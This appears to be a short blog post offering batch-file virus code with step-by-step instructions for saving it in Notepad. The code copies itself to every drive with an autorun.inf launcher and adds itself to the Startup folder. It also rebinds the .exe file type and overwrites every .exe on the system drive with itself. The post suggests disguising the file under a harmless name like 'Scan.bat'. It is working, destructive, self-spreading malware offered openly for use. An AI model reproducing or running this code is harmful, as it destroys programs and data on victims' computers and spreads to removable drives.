Add one of these to your .bat, and it will infect that with the virus.its very dengerous..!!
Open Notepad(Start > All Programs > Accessories > Notepad).
Copy the following code and paste it in notepad.
Code:
1. Infect all drives:
rem ---------------------------------
rem Infect All Drives
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ---------------------------------
2. Infect Startup:
rem ---------------------------------
rem Infect Startup Folder
copy %0 "%userprofile%\Start Menu\Programs\Startup"
rem ---------------------------------
3. Infect all of a certain filetype. Here's For .exe:
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------
From the Menu bar, click on File > Save As. The Save As dialog box opens
Under the Save as type select All Files option. Write a desired name for your file, for example Scan.bat [Remember to give a '.bat' extension to your file name].
done !!!!

0 comments:
Post a Comment